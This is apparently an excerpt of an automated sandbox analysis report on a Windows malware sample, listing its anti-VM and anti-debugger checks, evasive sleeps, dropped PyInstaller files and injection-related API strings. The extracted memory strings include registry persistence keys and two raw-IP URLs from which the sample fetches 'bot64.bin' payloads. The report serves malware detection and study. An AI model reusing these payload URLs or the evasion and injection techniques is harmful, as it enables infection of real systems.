Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: file.exe, svchost.exe, 7D3ED97FB83B796922796.exe, audiodg.exe, msiexec.exe Binary or memory string: PROCESSHACKER.EXE
Source: file.exe, svchost.exe, 7D3ED97FB83B796922796.exe, audiodg.exe, msiexec.exe Binary or memory string: PROCMON.EXE
Source: msiexec.exe, 00000010.00000002.2032396064.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmp Binary or memory string: ZEROX64MADE IN ALGERIA <3REFLECTIVELOADERZBISOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN.EXESOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDERWCSCPYLOADLIBRARYAKERNEL32.DLLGETPROCADDRESSKERNEL32.DLLMSVCRT.DLLWCSCATMSVCRT.DLLWCSCMPMSVCRT.DLLWCSNCPYMSVCRT.DLLWCSLENMSVCRT.DLLSTRLENMSVCRT.DLLREALLOCMSVCRT.DLLFREEMSVCRT.DLLWCSSTRMSVCRT.DLLCLOSEHANDLEKERNEL32.DLLGETVERSIONEXAKERNEL32.DLLCREATEDIRECTORYAKERNEL32.DLLGETFILEATTRIBUTESAKERNEL32.DLLGETMODULEFILENAMEAKERNEL32.DLLCOPYFILEAKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLCREATEFILEAKERNEL32.DLLHEAPALLOCKERNEL32.DLLGETPROCESSHEAPKERNEL32.DLLEXPANDENVIRONMENTSTRINGSWKERNEL32.DLLRESUMETHREADKERNEL32.DLLSETTHREADCONTEXTKERNEL32.DLLRTLCOMPAREMEMORYKERNEL32.DLLVIRTUALALLOCEXKERNEL32.DLLGETMODULEHANDLEAKERNEL32.DLLGETTHREADCONTEXTKERNEL32.DLLGETMODULEFILENAMEWKERNEL32.DLLVIRTUALPROTECTEXKERNEL32.DLLGETLASTERRORKERNEL32.DLLRELEASEMUTEXKERNEL32.DLLCREATEMUTEXAKERNEL32.DLLHEAPFREEKERNEL32.DLLWAITFORSINGLEOBJECTKERNEL32.DLLCREATETHREADKERNEL32.DLLCHECKREMOTEDEBUGGERPRESENTKERNEL32.DLLGETCURRENTPROCESSKERNEL32.DLLISDEBUGGERPRESENTKERNEL32.DLLEXITPROCESSKERNEL32.DLLDELETEFILEAKERNEL32.DLLPROCESS32NEXTWKERNEL32.DLLTERMINATEPROCESSKERNEL32.DLLOPENPROCESSKERNEL32.DLLPROCESS32FIRSTWKERNEL32.DLLCREATETOOLHELP32SNAPSHOTKERNEL32.DLLSETENDOFFILEKERNEL32.DLLLSTRCMPAKERNEL32.DLLWRITEPROCESSMEMORYKERNEL32.DLLREADPROCESSMEMORYKERNEL32.DLLGETFILESIZEKERNEL32.DLLWRITEFILEKERNEL32.DLLADJUSTTOKENPRIVILEGESADVAPI32.DLLOPENPROCESSTOKENADVAPI32.DLLLOOKUPPRIVILEGEVALUEWADVAPI32.DLLGETTOKENINFORMATIONADVAPI32.DLLCREATEFILEWKERNEL32.DLLSHGETFOLDERPATHWSHELL32.DLLSHGETFOLDERPATHASHELL32.DLLLSTRCATAKERNEL32.DLLSETFILEATTRIBUTESAKERNEL32.DLLSHGETKNOWNFOLDERPATHSHELL32.DLLFREELIBRARYKERNEL32.DLLMOVEFILEWKERNEL32.DLLGETFILESIZEEXKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLGETVOLUMEINFORMATIONAKERNEL32.DLLGETTICKCOUNTKERNEL32.DLLWSPRINTFWUSER32.DLLWSPRINTFAUSER32.DLLVIRTUALALLOCKERNEL32.DLLREADFILEKERNEL32.DLLSLEEPKERNEL32.DLLVIRTUALFREEKERNEL32.DLLSETFILEPOINTERKERNEL32.DLLCREATEDIRECTORYWKERNEL32.DLLFINDFIRSTFILEWKERNEL32.DLLFINDNEXTFILEWKERNEL32.DLLFINDCLOSEKERNEL32.DLLCOPYFILEWKERNEL32.DLLWRITEFILEKERNEL32.DLLGETSYSTEMDIRECTORYWKERNEL32.DLLEXITPROCESSKERNEL32.DLLCREATEREMOTETHREADKERNEL32.DLLINTERNETOPENURLWWININET.DLLINTERNETREADFILEWININET.DLLHTTPQUERYINFOAWININET.DLLINTERNETOPENWWININET.DLLINTERNETCONNECTWWININET.DLLHTTPOPENREQUESTWWININET.DLLHTTPSENDREQUESTAWININET.DLLINTERNETCLOSEHANDLEWININET.DLLPATHISURLWSHLWAPI.DLLPATHCOMBINEWSHLWAPI.DLLPATHFINDFILENAMEWSHLWAPI.DLLSTRSTRASHLWAPI.DLLURLDOWNLOADTOFILEWURLMON.DLLCREATEPROCESSWKERNEL32.DLLSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWKERNEL32.DLLGETSHORTPATHNAMEWKERNEL32.DLLGETENVIRONMENTVARIABLEWKERNEL32.DLLGETUSERNAMEAADVAPI32.DLLREGDELETEKEYWADVAPI32.DLLREGOPENKEYEXAADVAPI32.DLLREGSETVALUEEXAADVAPI32.DLLREGCLOSEKEYADVAPI32.DLLMESSAGEBOXAUSER32.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WIN64;
Source: file.exe, svchost.exe, 7D3ED97FB83B796922796.exe, audiodg.exe, msiexec.exe Binary or memory string: X64DBG.EXE
Source: file.exe, 00000000.00000002.1816809093.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IEXEC.EXE.RELOC%SYSTEMROOT%\SYSTEM32\AUDIODG.EXENTUNMAPVIEWOFSECTIONCHFRWWDQWSLFEVUR.X64.X86RBNSPGESYBPROCESSHACKER.EXEHTTP://176.111.174.177/BIN/BOT64.BINHTTP://176.111.174.140/BIN/BOT64.BINPROCEXP.EXEPROCEXP64.EXETOTALCMD.EXEX64DBG.EXEIDAQ64.EXEIDAQ.EXEAUTORUNS.EXEPROCMON.EXESERVICESHTTP://176.111.174.177/BIN/BOT64.BINHTTP://176.111.174.140/BIN/BOT64.BINSVCHOST.EXEWORKER_VZNLPBPUTGMSIEXEC.EXEWORKER_ZLPJBMHSTEAUDIODG.EXEWORKER_PPCJTQMKMCWORKER_VZNLPBPUTG%08LX%04LX%LU\\.EXESERVICESSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCEDHIDDENUNKNOWNEXPLORER.EXESEDEBUGPRIVILEGE
Source: file.exe, svchost.exe, 7D3ED97FB83B796922796.exe, audiodg.exe, msiexec.exe Binary or memory string: AUTORUNS.EXE
Source: 7D3ED97FB83B796922796.exe.0.dr Binary or memory string: KZEROX64MADE IN ALGERIA <3REFLECTIVELOADERZBISOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN.EXESOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDERWCSCPYLOADLIBRARYAKERNEL32.DLLGETPROCADDRESSKERNEL32.DLLMSVCRT.DLLWCSCATMSVCRT.DLLWCSCMPMSVCRT.DLLWCSNCPYMSVCRT.DLLWCSLENMSVCRT.DLLSTRLENMSVCRT.DLLREALLOCMSVCRT.DLLFREEMSVCRT.DLLWCSSTRMSVCRT.DLLCLOSEHANDLEKERNEL32.DLLGETVERSIONEXAKERNEL32.DLLCREATEDIRECTORYAKERNEL32.DLLGETFILEATTRIBUTESAKERNEL32.DLLGETMODULEFILENAMEAKERNEL32.DLLCOPYFILEAKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLCREATEFILEAKERNEL32.DLLHEAPALLOCKERNEL32.DLLGETPROCESSHEAPKERNEL32.DLLEXPANDENVIRONMENTSTRINGSWKERNEL32.DLLRESUMETHREADKERNEL32.DLLSETTHREADCONTEXTKERNEL32.DLLRTLCOMPAREMEMORYKERNEL32.DLLVIRTUALALLOCEXKERNEL32.DLLGETMODULEHANDLEAKERNEL32.DLLGETTHREADCONTEXTKERNEL32.DLLGETMODULEFILENAMEWKERNEL32.DLLVIRTUALPROTECTEXKERNEL32.DLLGETLASTERRORKERNEL32.DLLRELEASEMUTEXKERNEL32.DLLCREATEMUTEXAKERNEL32.DLLHEAPFREEKERNEL32.DLLWAITFORSINGLEOBJECTKERNEL32.DLLCREATETHREADKERNEL32.DLLCHECKREMOTEDEBUGGERPRESENTKERNEL32.DLLGETCURRENTPROCESSKERNEL32.DLLISDEBUGGERPRESENTKERNEL32.DLLEXITPROCESSKERNEL32.DLLDELETEFILEAKERNEL32.DLLPROCESS32NEXTWKERNEL32.DLLTERMINATEPROCESSKERNEL32.DLLOPENPROCESSKERNEL32.DLLPROCESS32FIRSTWKERNEL32.DLLCREATETOOLHELP32SNAPSHOTKERNEL32.DLLSETENDOFFILEKERNEL32.DLLLSTRCMPAKERNEL32.DLLWRITEPROCESSMEMORYKERNEL32.DLLREADPROCESSMEMORYKERNEL32.DLLGETFILESIZEKERNEL32.DLLWRITEFILEKERNEL32.DLLADJUSTTOKENPRIVILEGESADVAPI32.DLLOPENPROCESSTOKENADVAPI32.DLLLOOKUPPRIVILEGEVALUEWADVAPI32.DLLGETTOKENINFORMATIONADVAPI32.DLLCREATEFILEWKERNEL32.DLLSHGETFOLDERPATHWSHELL32.DLLSHGETFOLDERPATHASHELL32.DLLLSTRCATAKERNEL32.DLLSETFILEATTRIBUTESAKERNEL32.DLLSHGETKNOWNFOLDERPATHSHELL32.DLLFREELIBRARYKERNEL32.DLLMOVEFILEWKERNEL32.DLLGETFILESIZEEXKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLGETVOLUMEINFORMATIONAKERNEL32.DLLGETTICKCOUNTKERNEL32.DLLWSPRINTFWUSER32.DLLWSPRINTFAUSER32.DLLVIRTUALALLOCKERNEL32.DLLREADFILEKERNEL32.DLLSLEEPKERNEL32.DLLVIRTUALFREEKERNEL32.DLLSETFILEPOINTERKERNEL32.DLLCREATEDIRECTORYWKERNEL32.DLLFINDFIRSTFILEWKERNEL32.DLLFINDNEXTFILEWKERNEL32.DLLFINDCLOSEKERNEL32.DLLCOPYFILEWKERNEL32.DLLWRITEFILEKERNEL32.DLLGETSYSTEMDIRECTORYWKERNEL32.DLLEXITPROCESSKERNEL32.DLLCREATEREMOTETHREADKERNEL32.DLLINTERNETOPENURLWWININET.DLLINTERNETREADFILEWININET.DLLHTTPQUERYINFOAWININET.DLLINTERNETOPENWWININET.DLLINTERNETCONNECTWWININET.DLLHTTPOPENREQUESTWWININET.DLLHTTPSENDREQUESTAWININET.DLLINTERNETCLOSEHANDLEWININET.DLLPATHISURLWSHLWAPI.DLLPATHCOMBINEWSHLWAPI.DLLPATHFINDFILENAMEWSHLWAPI.DLLSTRSTRASHLWAPI.DLLURLDOWNLOADTOFILEWURLMON.DLLCREATEPROCESSWKERNEL32.DLLSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWKERNEL32.DLLGETSHORTPATHNAMEWKERNEL32.DLLGETENVIRONMENTVARIABLEWKERNEL32.DLLGETUSERNAMEAADVAPI32.DLLREGDELETEKEYWADVAPI32.DLLREGOPENKEYEXAADVAPI32.DLLREGSETVALUEEXAADVAPI32.DLLREGCLOSEKEYADVAPI32.DLLMESSAGEBOXAUSER32.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WIN64
Source: file.exe, svchost.exe, 7D3ED97FB83B796922796.exe, audiodg.exe, msiexec.exe Binary or memory string: IDAQ.EXE
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Memory allocated: 1370000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Memory allocated: 2E10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Memory allocated: 4E10000 memory reserve | memory write watch Jump to behavior
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\explorer.exe Code function: 4_2_0E8F7CF0 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle, 4_2_0E8F7CF0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 2947 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1174 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 685 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 670 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 6811 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 701 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 708 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Window / User API: threadDelayed 1143 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Window / User API: threadDelayed 1826 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\libcrypto-1_1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\_lzma.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\select.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\_socket.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\python38.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\_bz2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Found evaded block containing many API calls
Source: C:\Windows\System32\svchost.exe Evaded block: after key decision
Source: C:\Windows\System32\msiexec.exe Evaded block: after key decision
Found evasive API chain checking for process token information
Source: C:\Users\user\Desktop\file.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\audiodg.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\msiexec.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\svchost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Windows\explorer.exe API coverage: 5.6 %
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe API coverage: 1.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\audiodg.exe TID: 7016 Thread sleep time: -50000s >= -30000s Jump to behavior
Source: C:\Windows\System32\audiodg.exe TID: 7016 Thread sleep count: 296 > 30 Jump to behavior
Source: C:\Windows\System32\audiodg.exe TID: 7016 Thread sleep time: -14800000s >= -30000s Jump to behavior
Source: C:\Windows\System32\audiodg.exe TID: 4476 Thread sleep count: 52 > 30 Jump to behavior
Source: C:\Windows\System32\audiodg.exe TID: 4476 Thread sleep time: -140400s >= -30000s Jump to behavior
Source: C:\Windows\System32\audiodg.exe TID: 6248 Thread sleep count: 169 > 30 Jump to behavior
Source: C:\Windows\System32\audiodg.exe TID: 6248 Thread sleep time: -1014000s >= -30000s Jump to behavior
Source: C:\Windows\System32\audiodg.exe TID: 7016 Thread sleep time: -50000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7036 Thread sleep count: 2947 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7036 Thread sleep time: -147350000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7036 Thread sleep time: -50000s >= -30000s Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 7072 Thread sleep time: -50000s >= -30000s Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 7072 Thread sleep count: 1099 > 30 Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 7072 Thread sleep time: -54950000s >= -30000s Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 7128 Thread sleep count: 74 > 30 Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 7128 Thread sleep time: -199800s >= -30000s Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 7072 Thread sleep time: -50000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 5016 Thread sleep time: -234800s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 3128 Thread sleep time: -137000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 7124 Thread sleep time: -134000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 5288 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 5016 Thread sleep time: -1362200s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe TID: 5300 Thread sleep time: -10145709240540247s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe TID: 6348 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\audiodg.exe Last function: Thread delayed
Source: C:\Windows\System32\audiodg.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\msiexec.exe Last function: Thread delayed
Source: C:\Windows\System32\msiexec.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3E85A0 FindFirstFileExW,FindClose, 17_2_00007FF69F3E85A0
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3E79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 17_2_00007FF69F3E79B0
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F400B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 17_2_00007FF69F400B84
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3E85A0 FindFirstFileExW,FindClose, 18_2_00007FF69F3E85A0
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F400B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 18_2_00007FF69F400B84
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3E79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 18_2_00007FF69F3E79B0
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC9303C FindFirstFileExW,FindNextFileW,FindClose, 18_2_00007FFDFFC9303C
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC93280 FindFirstFileExW,FindNextFileW,FindClose, 18_2_00007FFDFFC93280
Source: C:\Windows\explorer.exe Code function: 4_2_0E8F6F50 GetSystemInfo,VirtualAlloc,VirtualAlloc, 4_2_0E8F6F50
Source: C:\Windows\System32\audiodg.exe Thread delayed: delay time: 50000 Jump to behavior
Source: C:\Windows\System32\audiodg.exe Thread delayed: delay time: 50000 Jump to behavior
Source: C:\Windows\System32\audiodg.exe Thread delayed: delay time: 50000 Jump to behavior
Source: C:\Windows\System32\svchost.exe Thread delayed: delay time: 50000 Jump to behavior
Source: C:\Windows\System32\svchost.exe Thread delayed: delay time: 50000 Jump to behavior
Source: C:\Windows\System32\msiexec.exe Thread delayed: delay time: 50000 Jump to behavior
